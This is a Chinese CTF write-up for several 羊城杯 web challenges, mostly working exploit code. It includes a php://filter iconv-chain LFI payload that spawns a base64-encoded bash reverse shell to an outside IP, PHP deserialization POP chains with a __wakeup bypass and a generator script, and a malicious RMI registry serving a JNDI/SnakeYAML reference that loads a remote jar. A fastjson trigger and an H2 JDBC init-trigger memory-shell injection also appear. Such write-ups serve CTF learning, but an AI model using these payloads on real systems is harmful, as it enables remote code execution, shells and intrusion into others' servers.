羊城杯


rce_me

File inclusion with a filter on the parameter; URL-encoding the payload gets past the blacklist. Just throw the standard PHP LFI payload at it: the `php://filter` convert.iconv chain (the php_filter_chain_generator technique) that turns any readable resource, here `/etc/passwd`, into a PHP stub that evaluates the `1` GET parameter. That parameter calls system() on a base64-encoded reverse shell (`bash -i >&/dev/tcp/47.96.173.116/2333 0>&1`):

/?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.GBK.UTF-8|convert.iconv.IEC%5fP27-1.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859%5f4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT%5fJISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT%5fJISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61|convert.iconv.ISO6937.EUC-JP-MS|convert.iconv.EUCKR.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CN.ISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859%5f3.UTF16|convert.iconv.863.SHIFT%5fJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT%5fJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT%5fJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd&1=system('echo+YmFzaCAtaSA%2bJi9kZXYvdGNwLzQ3Ljk2LjE3My4xMTYvMjMzMyAwPiYx|base64+-d|bash')%3b

The reverse shell lands as a user that cannot read the flag, so look for SUID binaries:

find / -perm -u=s -type f 2>/dev/null

`date` turns up. `date -f FILE` parses every line of FILE as a date and echoes each line it cannot parse back in an `invalid date '...'` error, so with the SUID bit it reads the flag directly:

date -f /flag

step_by_step-v3

A simple deserialization chain. exp.php:

<?php
class cheng
{
    public $c1;
    public function __construct($c1)
    {
        $this->c1 = $c1;
    }
}
class bei
{
    public $b1;
    public function __construct()
    {
        $this->b1 = new yang();
    }
}
class yang
{
    public $y1;
    public function __construct()
    {
        $this->y1 = "phpinfo";
    }
}
echo urlencode(serialize(new cheng(new bei())));

There is also a file upload, but the blacklist is unknown and I had no ideas. I looked at the phpinfo output, and the flag turned out to be right there in phpinfo.

Safepop

Deserialization again. The chain has to get past a throw and also past __wakeup. I remembered a bypass from a 天翼杯 challenge: adding extra content to the serialized data gets around __wakeup. Payload:

a%3A1%3A%7Bi%3A0%3BO%3A1%3A%22B%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A10%3A%22cat+%2Fflag%3F%22%3Bs%3A1%3A%22a%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22Fun%22%3A2%3A%7Bs%3A9%3A%22%00Fun%00func%22%3Bs%3A6%3A%22system%22%3Bs%3A1%3A%22p%22%3BO%3A4%3A%22Test%22%3A0%3A%7B%7D%7D;%7D%7D%7D 

The bypass is the stray `;` after the `}` that closes the Fun object (the `};` near the end of the payload): unserialize() aborts at that point and releases the objects it has already built, which on the challenge's PHP fired the chain's __destruct without __wakeup running, so it is direct RCE. (How a failed unserialize() treats __wakeup and __destruct has changed across PHP versions, so test the trick against the target's version.) exp.php for the POP chain:

<?php
class Fun
{
    private $func = 'system';   // serialized as "\0Fun\0func" (private name mangling)
    public $p;
    public function __construct()
    {
        $this->p = new Test();
    }
}
class B
{
    public $p;
    public $a;
    public function __construct()
    {
        $this->p = "cat /flag?";
        $this->a = new A();
    }
}
class Test{
    public function __construct()
    {
    }
}
class A {
    public $a;
    public function __construct()
    {
        $this->a = new Fun();
    }
}
$a = array(new B());
// Prints the intact chain; the ';' after the Fun object is inserted by hand afterwards.
echo urlencode(serialize($a));
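As an added example (not from the original writeup), the Python below reproduces both exp.php outputs above, the step_by_step-v3 chain and the Safepop chain, without needing a PHP interpreter, and makes explicit the two details the payloads depend on: private property names are mangled to `\0Class\0name` (hence `s:9:"%00Fun%00func"`), and the __wakeup bypass is a single `;` inserted immediately after the serialized Fun object. Class names and values are the ones in the two exps; the serializer itself and the `fault_after` helper are this example's own.

```python
from urllib.parse import quote_plus


class PhpObject:
    """A PHP object to serialize: class name plus (visibility, name, value) props in order."""

    def __init__(self, cls, props):
        self.cls = cls
        self.props = props


def mangle(cls, visibility, name):
    """PHP stores private props as \\0Class\\0name and protected ones as \\0*\\0name."""
    if visibility == "private":
        return f"\x00{cls}\x00{name}"
    if visibility == "protected":
        return f"\x00*\x00{name}"
    return name


def php_serialize(value):
    """Subset of PHP serialize(): null, bool, int, str, list (as array), PhpObject."""
    if value is None:
        return "N;"
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        # s:<byte length>:"<raw bytes>"; the length counts bytes, not characters
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, list):
        body = "".join(f"i:{i};{php_serialize(v)}" for i, v in enumerate(value))
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, PhpObject):
        body = "".join(
            php_serialize(mangle(value.cls, vis, name)) + php_serialize(val)
            for vis, name, val in value.props
        )
        return f'O:{len(value.cls)}:"{value.cls}":{len(value.props)}:{{{body}}}'
    raise TypeError(f"cannot serialize {type(value).__name__}")


def step_by_step_chain():
    """cheng -> bei -> yang with y1 = "phpinfo" (the step_by_step-v3 exp)."""
    yang = PhpObject("yang", [("public", "y1", "phpinfo")])
    bei = PhpObject("bei", [("public", "b1", yang)])
    return php_serialize(PhpObject("cheng", [("public", "c1", bei)]))


def fault_after(payload, inner):
    """Insert ';' right after the first occurrence of `inner`, so unserialize() fails once
    the inner object exists but before the enclosing objects are finished."""
    idx = payload.index(inner) + len(inner)
    return payload[:idx] + ";" + payload[idx:]


def safepop_chain(cmd="cat /flag?"):
    """array -> B -> A -> Fun(func=system, p=Test), faulted right after Fun (the Safepop exp)."""
    fun = PhpObject("Fun", [("private", "func", "system"), ("public", "p", PhpObject("Test", []))])
    a = PhpObject("A", [("public", "a", fun)])
    b = PhpObject("B", [("public", "p", cmd), ("public", "a", a)])
    return fault_after(php_serialize([b]), php_serialize(fun))


def url_encode(payload):
    """Same result as PHP's urlencode(): NUL bytes become %00, spaces become '+'."""
    return quote_plus(payload)


if __name__ == "__main__":
    print(url_encode(step_by_step_chain()))
    print(url_encode(safepop_chain()))
```

The `fault_after` step is the whole difference between the exp.php output and the payload pasted above: the intact chain is serialized first, then the stream is corrupted at the exact offset where the innermost object is already complete.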

simple_json (reproduced after the event)

Java kills me. After studying Java for so long I still can't solve a challenge; still far too weak... The challenge hands you the payload, and what it tests is JNDI injection on a recent JDK (8u191+, where loading classes from a remote codebase is disabled by default). Dest0g3 520迎新赛's ljctr tested exactly this; I never reproduced it properly and paid for it here. I spent a whole afternoon on SnakeYAML without getting it to work, in the classic fog of an all-nighter. So take the payload straight from GitHub: https://github.com/artsploit/yaml-payload
Download it and change the exp inside:

// Constructor of the ScriptEngineFactory in yaml-payload: it runs as soon as
// javax.script.ScriptEngineManager instantiates the factory it finds in the jar.
public AwesomeScriptEngineFactory() {
    try {
        Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ni4xNzMuMTE2LzIzMzMgMD4mMQ==}|{base64,-d}|{bash,-i}");
    } catch (IOException e) {
        e.printStackTrace();
    }
}

Then an RMI service has to run on the server. This had me completely stuck: I meant to hand-roll one, but the target never managed to connect and I have no idea why. So I borrowed a tool: the RMI server from my earlier jndi_tools.jar, with only the EL payload swapped out.

The way this gets around the remote-codebase restriction is that the Reference returned by the registry names a factory that is already on the target's classpath: Tomcat's org.apache.naming.factory.BeanFactory instantiates the referenced class (org.yaml.snakeyaml.Yaml) and, because of the `forceString` attribute `a=load`, calls its one-String-argument method load() with the attacker-supplied YAML. SnakeYAML then builds a javax.script.ScriptEngineManager over a URLClassLoader pointing at the attacker's jar, and the engine-factory lookup instantiates the AwesomeScriptEngineFactory above, whose constructor runs the command. Note two things about the code below: only the `el-linux` branch is used, so `evilCode` is never consumed on the Linux path (the command lives in yaml-payload.jar instead), and Tomcat removed support for `forceString` from BeanFactory in 2022 (9.0.63 / 8.5.79 / 10.0.21), so the trick only works against targets bundling an older Tomcat:

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;
import java.io.OutputStream;
import java.net.InetAddress;
import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.net.Socket;
import java.rmi.MarshalException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.rmi.server.RMISocketFactory;
import java.rmi.server.UID;
import java.util.Arrays;
import java.util.Scanner;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import javax.net.ServerSocketFactory;
import org.apache.naming.ResourceRef;

public class YamlJNDI {
    public static void main(String[] args) throws Exception {
        int port = 6666;
        int rmi = 1099;
        String evilCode = "curl dnslog.wyzxxz.cn";
        String type = "el-linux";
        String hostname = "47.96.173.116";
//        if (args.length < 3) {
//            System.err.println("[-] Usage: java -cp jndi_tool.jar jndi.EvilRMIServer 8888 1099 \"curl dnslog.cn\"");
//            System.exit(-1);
//            return;
//        }
//        if (args.length >= 3) {
//            port = Integer.parseInt(args[0]);
//            rmi = Integer.parseInt(args[1]);
//            evilCode = args[2];
//            try {
//                type = args[3].toLowerCase();
//            } catch (Exception e) {
//                type = "el-linux";
//            }
//        }
        try {
            hostname = InetAddress.getLocalHost().getHostName();
        } catch (Exception exception) {}
        System.err.println("[-] rmi_port:" + String.valueOf(port) + ", socket_port:" + String.valueOf(rmi) + ", evilcode: " + evilCode);
        while (true) {
            try {
                Long.valueOf(hostname.replace(".", ""));
                break;
            } catch (Exception e) {
                System.out.println("[-] current hostname error: " + hostname);
                Scanner sc = new Scanner(System.in);
                System.out.println("[-] please enter new hostname(ip)");
                System.out.print("> ");
                hostname = sc.nextLine().trim();
            }
        }
        System.setProperty("java.rmi.server.hostname", hostname);
        System.err.println("[-] use payload: rmi://" + hostname + ":" + String.valueOf(port) + "/Object");
        ServerSocket ss = null;
        SMRMISocket SMSS = new SMRMISocket();
        SMSS.setPort(rmi);
        try {
            RMISocketFactory.setSocketFactory(SMSS);
            System.out.println("[-] Creating SocketFactory on port " + String.valueOf(rmi));
        } catch (Exception localException) {
            localException.printStackTrace();
            System.out.println("error in SMRMISocket");
        }
        Registry registry = LocateRegistry.createRegistry(port);
        System.out.println("[-] Creating evil RMI registry on port " + String.valueOf(port));
        try {
            if (type.startsWith("el-")) {
                ResourceRef ref = new ResourceRef("org.yaml.snakeyaml.Yaml", null, "", "",
                        true, "org.apache.naming.factory.BeanFactory", null);
                String yaml = "!!javax.script.ScriptEngineManager [\n" +
                        "  !!java.net.URLClassLoader [[\n" +
                        "    !!java.net.URL [\"http://47.96.173.116:8000/yaml-payload.jar\"]\n" +
                        "  ]]\n" +
                        "]";
                ref.add(new StringRefAddr("forceString", "a=load"));
                if (type.endsWith("linux")) {
                    ref.add(new StringRefAddr("a", yaml));
                } else if (type.endsWith("win")) {
                    ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd.exe','/c','" + evilCode + "']).start()\")"));
                } else {
                    ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"java.lang.Runtime.getRuntime().exec('" + evilCode + "')\")"));
                }
                ReferenceWrapper referenceWrapper = new ReferenceWrapper((Reference)ref);
                registry.bind("Object", referenceWrapper);
            } else if (type.equals("groovy")) {
                ResourceRef ref = new ResourceRef("groovy.lang.GroovyClassLoader", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
                ref.add(new StringRefAddr("forceString", "x=parseClass"));
                String script = "@groovy.transform.ASTTest(value={\n    assert java.lang.Runtime.getRuntime().exec(\"" + evilCode + "\")\n})\ndef x\n";
                ref.add(new StringRefAddr("x", script));
                ReferenceWrapper referenceWrapper = new ReferenceWrapper((Reference)ref);
                registry.bind("Object", referenceWrapper);
            } else {
                System.err.println("[-] Usage: java -cp jndi_tool.jar jndi.EvilRMIServer 8888 1099 \"curl dnslog.cn\" el-win/el-linux/groovy");
                System.exit(-1);
                return;
            }
            ss = SMSS.getSS();
            handleSocket(ss);
        } catch (Exception e) {
            System.out.println("error. " + e.getMessage());
        }
        System.out.println("[-] end.");
    }

    private static void handleSocket(ServerSocket ss) {
        Socket s = null;
        try {
            System.out.println("[-] waiting target connect RMI SocketFactory ...");
            while ((s = ss.accept()) != null) {
                InetSocketAddress remote = (InetSocketAddress)s.getRemoteSocketAddress();
                System.err.println("[*] Have connection from " + remote);
                InputStream is = s.getInputStream();
                InputStream bufIn = is.markSupported() ? is : new BufferedInputStream(is);
                bufIn.mark(4);
                try {
                    DataInputStream in = new DataInputStream(bufIn);
                    int magic = in.readInt();
                    short version = in.readShort();
                    if (magic != 1246907721 || version != 2) {
                        s.close();
                        continue;
                    }
                    OutputStream sockOut = s.getOutputStream();
                    BufferedOutputStream bufOut = new BufferedOutputStream(sockOut);
                    try {
                        DataOutputStream out = new DataOutputStream(bufOut);
                        byte protocol = in.readByte();
                        switch (protocol) {
                            case 75:
                                out.writeByte(78);
                                if (remote.getHostName() != null) {
                                    out.writeUTF(remote.getHostName());
                                } else {
                                    out.writeUTF(remote.getAddress().toString());
                                }
                                out.writeInt(remote.getPort());
                                out.flush();
                                in.readUTF();
                                in.readInt();
                            case 76:
                                doMessage(s, in, out);
                                break;
                            default:
                                System.err.println("Unsupported protocol");
                                s.close();
                                continue;
                        }
                        bufOut.flush();
                        out.flush();
                    } catch (Exception e) {
                        e.printStackTrace();
                    }
                } catch (Exception e) {
                    e.printStackTrace();
                }
                System.err.println("[*] Start send evil code to " + remote.getHostName());
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static class SMRMISocket extends RMISocketFactory {
        private ServerSocket ss;

        private int port = 53;

        public Socket createSocket(String host, int port) throws IOException {
            return new Socket(host, port);
        }

        public ServerSocket createServerSocket(int port) throws IOException {
            if (port == 0)
                port = this.port;
            this.ss = ServerSocketFactory.getDefault().createServerSocket(port);
            return this.ss;
        }

        public ServerSocket getSS() {
            return this.ss;
        }

        private void setPort(int port) {
            this.port = port;
        }
    }

    private static boolean handleRMI(ObjectInputStream ois, DataOutputStream out) throws Exception {
        int method = ois.readInt();
        ois.readLong();
        if (method != 2)
            return false;
        String object = (String)ois.readObject();
        System.err.println("[*] Is RMI.lookup call for " + object + " " + method);
        return true;
    }

    private static void doMessage(Socket s, DataInputStream in, DataOutputStream out) throws Exception {
        System.err.println("[*] Reading message...");
        int op = in.read();
        switch (op) {
            case 80:
                doCall(in, out);
                break;
            case 82:
                out.writeByte(83);
                break;
            case 84:
                UID.read(in);
                break;
            default:
                throw new IOException("unknown transport op " + op);
        }
        s.close();
    }

    private static void doCall(DataInputStream in, DataOutputStream out) throws Exception {
        ObjID read;
        ObjectInputStream ois = new ObjectInputStream(in) {
            protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
                if ("[Ljava.rmi.server.ObjID;".equals(desc.getName()))
                    return ObjID[].class;
                if ("java.rmi.server.ObjID".equals(desc.getName()))
                    return ObjID.class;
                if ("java.rmi.server.UID".equals(desc.getName()))
                    return UID.class;
                if ("java.lang.String".equals(desc.getName()))
                    return String.class;
                throw new IOException("Not allowed to read object");
            }
        };
        try {
            read = ObjID.read(ois);
        } catch (IOException e) {
            throw new MarshalException("unable to read objID", e);
        }
        if (read.hashCode() == 2) {
            handleDGC(ois);
        } else if (read.hashCode() == 0) {
            handleRMI(ois, out);
        }
    }

    private static void handleDGC(ObjectInputStream ois) throws IOException, ClassNotFoundException {
        ois.readInt();
        ois.readLong();
        System.err.println("[-] Is DGC call for " + Arrays.toString((Object[])ois.readObject()));
    }
}

Then build it into a jar. pom.xml:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>snakeyaml_jndi</artifactId>
    <version>1.0</version>

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
                <executions>
                    <execution>
                        <goals>
                            <goal>repackage</goal>
                        </goals>
                    </execution>
                </executions>
            </plugin>
        </plugins>
    </build>

    <dependencies>
        <dependency>
            <groupId>org.apache.tomcat.embed</groupId>
            <artifactId>tomcat-embed-core</artifactId>
            <version>9.0.30</version>
            <scope>compile</scope>
        </dependency>
    </dependencies>

    <properties>
        <maven.compiler.source>1.8</maven.compiler.source>
        <maven.compiler.target>1.8</maven.compiler.target>
    </properties>

</project>

Upload it to the VPS and run it, and serve the yaml-payload.jar built above over HTTP on port 8000 (the URL hard-coded in the YAML string). Final payload; the `$ref` to `$.content.context` makes fastjson invoke the `context` getter on the deserialized JNDIService, which is what performs the lookup against the malicious registry:

{"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"rmi://47.96.173.116:6666/Object"}, "msg":{"$ref":"$.content.context"}}
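To make the handshake the hand-written registry above performs explicit, here is an added Python example (not from the writeup or from jndi_tools) that decodes and answers the first bytes of Java's JRMP transport, the same constants handleSocket()/doMessage()/doCall() compare against: the magic 1246907721 is the ASCII `JRMI`, 75/76 are StreamProtocol/SingleOpProtocol, 78 is ProtocolAck, and 80/82/84 are Call/Ping/DgcAck. It also names the well-known ObjID numbers (0 = registry, 2 = DGC) and registry operation numbers (2 = lookup) that doCall()/handleRMI() switch on. The client header in the usage section is constructed, and the host/port values are made up.

```python
import struct

JRMI_MAGIC = 0x4A524D49        # b"JRMI" = 1246907721, the value handleSocket() checks
JRMI_VERSION = 2

# Transport-level constants from the JRMP specification.
PROTOCOLS = {0x4B: "StreamProtocol", 0x4C: "SingleOpProtocol", 0x4D: "MultiplexProtocol"}
PROTOCOL_ACK, PROTOCOL_NACK = 0x4E, 0x4F
MESSAGES = {0x50: "Call", 0x51: "Return", 0x52: "Ping", 0x53: "PingAck", 0x54: "DgcAck"}

# ObjID numbers of the well-known remote objects, compared via ObjID.hashCode() in doCall().
WELL_KNOWN_OBJIDS = {0: "Registry", 1: "Activator", 2: "DGC"}
# Operation numbers of the java.rmi.registry.Registry stub, compared in handleRMI().
REGISTRY_OPS = {0: "bind", 1: "list", 2: "lookup", 3: "rebind", 4: "unbind"}


def java_utf(s):
    """DataOutputStream.writeUTF(): 2-byte big-endian length followed by the bytes."""
    data = s.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def read_java_utf(buf, offset):
    """Inverse of java_utf(); returns (string, new_offset)."""
    (length,) = struct.unpack_from(">H", buf, offset)
    start = offset + 2
    return buf[start:start + length].decode("utf-8"), start + length


def parse_header(data):
    """Decode the 7-byte client header (int magic, short version, byte protocol).
    Raises ValueError for anything that is not a JRMP handshake."""
    if len(data) < 7:
        raise ValueError("short header")
    magic, version, proto = struct.unpack(">IHB", data[:7])
    if magic != JRMI_MAGIC or version != JRMI_VERSION:
        raise ValueError("not a JRMP handshake")
    if proto not in PROTOCOLS:
        raise ValueError(f"unknown protocol byte 0x{proto:02x}")
    return PROTOCOLS[proto]


def protocol_ack(client_host, client_port):
    """Server reply in StreamProtocol: ProtocolAck, then the client endpoint as the server saw it
    (what the Java code writes in 'case 75'); the client then answers with its own host and port."""
    return bytes([PROTOCOL_ACK]) + java_utf(client_host) + struct.pack(">i", client_port)


def parse_protocol_ack(data):
    """Decode a ProtocolAck into (host, port); raises ValueError on a Nack or garbage."""
    if not data or data[0] != PROTOCOL_ACK:
        raise ValueError("not a ProtocolAck")
    host, offset = read_java_utf(data, 1)
    (port,) = struct.unpack_from(">i", data, offset)
    return host, port


def server_reply(client_header, client_host, client_port):
    """Bytes a listener sends back for a given header: an Ack for StreamProtocol, nothing for
    SingleOpProtocol (the client just sends its message), a Nack for anything else
    (the Java server above simply closes the socket in that case)."""
    proto = parse_header(client_header)
    if proto == "StreamProtocol":
        return protocol_ack(client_host, client_port)
    if proto == "SingleOpProtocol":
        return b""
    return bytes([PROTOCOL_NACK])


def describe_call(objnum, opnum):
    """Name the target object and operation of a Call, as doCall()/handleRMI() do."""
    target = WELL_KNOWN_OBJIDS.get(objnum, f"exported object {objnum}")
    if objnum == 0:
        return f"{target}.{REGISTRY_OPS.get(opnum, f'op {opnum}')}"
    return target


if __name__ == "__main__":
    # Constructed header: what a JDK RMI client sends when it opens a stream connection.
    header = b"JRMI" + struct.pack(">H", JRMI_VERSION) + b"K"
    print(parse_header(header), server_reply(header, "203.0.113.7", 40000).hex())
```

Everything after the Ack (the Call with its serialized ObjID and method number, and the Return carrying the Reference) is Java serialization, which is why the Java server needs an ObjectInputStream with a restrictive resolveClass() to read the lookup name safely.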

little_jvav (couldn't figure it out)

Something I had never seen before. For now the closest article I found: https://packetstormsecurity.com/files/165676/H2-Database-Console-Remote-Code-Execution.html
Reference writeup: https://mp.weixin.qq.com/s?srcid=0905PwTfAcHT1P2oIwXe0vSZ&scene=23&sharer_sharetime=1662358159364&mid=2247492779&sharer_shareid=af08bc9c7653e427562dda803abf19d6&sn=5ce1044c52f412c8b47c7ffccb4818c5&idx=1&__biz=MzIzMTQ4NzE2Ng%3D%3D&chksm=e8a1c77adfd64e6c01f21ab1de8a502c2a47a4d09a4cea289bb58ae725f64bb266b9e8db3d8e&mpshare=1#rd

I couldn't find much related material, so shoot first and draw the target later: take the exp from the writeup and run it locally.
I modified it slightly to use an Interceptor memory shell; the Test class and memory-shell code are the ones from the 网鼎杯 SSTI challenge: https://47.96.173.116/2022/08/27/%e7%bd%91%e9%bc%8e%e6%9d%af/#header-id-4

package ycb;

import javassist.ClassPool;
import ycb.tool.SecurityHelper;

import java.util.Base64;

public class Exp {
    public static void main(String[] args) throws Exception {
//        org.springframework.cglib.core.ReflectUtils.defineClass("ycb.Test",java.util.Base64.getDecoder().decode("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"),org.springframework.util.ClassUtils.getDefaultClassLoader()).newInstance().doInject();
//        byte[] bytes = ClassPool.getDefault().get("ycb.Test").toBytecode();
//        byte[] base64 = Base64.getEncoder().encode(bytes);
//        System.out.println(new String(base64));
        String out;
        out = SecurityHelper.encrypt("n3k0", "destoryDataSource");
        System.out.println(out);
        out = SecurityHelper.encrypt("n3k0", "createPool");
        System.out.println(out);
        String split_str = "#&DS_SPLITTAG&#";
//        String[] paramsStr = new String[]{"druid","mysql","com.mysql.cj.jdbc.Driver","jdbc:mysql://120.26.59.137:3309/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true","linux_passwd","admin","druid","10","10 ","1"};
        // H2 in-memory URL whose init= setting defines a JavaScript trigger. The trigger body
        // must not contain ';' because that character ends the init= setting inside the URL.
        String[] paramsStr = new String[]{"druid", "mysql", "org.h2.Driver",
                "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER edi BEFORE SELECT ON\n" +
                "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
                "org.springframework.cglib.core.ReflectUtils.defineClass(\"ycb.Test\",java.util.Base64.getDecoder().decode(\"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\"),org.springframework.util.ClassUtils.getDefaultClassLoader()).newInstance().doInject()\n" +
                "$$\n",
                "root", "admin", "druid", "10", "10", "1"};
        String type = paramsStr[0];
        String poolName = paramsStr[1];
        String driverClasses = paramsStr[2];
        String turl = paramsStr[3];
        String user = paramsStr[4];
        String password = paramsStr[5];
        String provider = paramsStr[6];
        String maxconn = paramsStr[7];
        String minconn = paramsStr[8];
        String usepool = paramsStr[9];
        String tmp_s = "";
        for (int i = 0; i < paramsStr.length; i++) {
            tmp_s += paramsStr[i] + split_str;
        }
        System.out.println(tmp_s);
        out = SecurityHelper.encrypt("n3k0", tmp_s);
        System.out.println(out);
        out = SecurityHelper.encrypt("n3k0", "mysql");
        System.out.println(out);
    }
}

Because the JS code cannot contain semicolons (`;` separates settings in the H2 JDBC URL, so the `init=` value would end at the first one), I squashed the JS from that article onto a single line...
Then the JS in the payload kept running over and over and nearly forced me to reboot the machine... I spent ages debugging; since I don't know druid, I don't know the details of how it connects to H2... But I did find the sink, in TriggerObject:

private Trigger loadFromSource() {
    SourceCompiler var1 = this.database.getCompiler();
    synchronized(var1) {
        String var3 = "org.h2.dynamic.trigger." + this.getName();
        var1.setSource(var3, this.triggerSource);

